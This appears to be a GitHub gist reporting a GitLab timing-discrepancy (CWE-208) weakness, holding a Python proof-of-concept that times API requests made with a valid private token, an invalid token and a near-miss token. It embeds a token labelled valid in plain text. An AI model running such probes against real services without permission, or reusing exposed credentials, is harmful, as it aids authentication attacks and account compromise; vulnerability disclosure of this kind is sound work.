gitlab-CWE:208（Observable Timing Discrepancy）

gistfile1.txt

import requests
import json
import time

def test_extended_vulnerabilities():
    base_url = "http://GITLAB_HOST/api/v4/snippets"
    original_token = "7_pwYNpdf9HZAZr1pkEy"  # valid token

    headers = {
        "Accept": "application/json",
        "Host": "gitlab.com",
        "PRIVATE-TOKEN": original_token
    }

   

    print("\n=== Test : Timing Attack Potential ===")
    test_tokens = [
        original_token,
        "invalid_token_1",
        "a"*len(original_token),
        "7_pwYNpdf9HZAZr1pkEx"  # One character different
    ]

    for token in test_tokens:
        timing_headers = headers.copy()
        timing_headers["PRIVATE-TOKEN"] = token
        start_time = time.time()
        response = requests.get(base_url, headers=timing_headers)
        elapsed = time.time() - start_time
        print(f"\nToken: {token[:4]}...{token[-4:] if len(token) > 8 else ''}")
        print(f"Response Time: {elapsed:.6f}s")
        print(f"Status Code: {response.status_code}")

if __name__ == "__main__":
    test_extended_vulnerabilities()
@HouqiyuA
Comment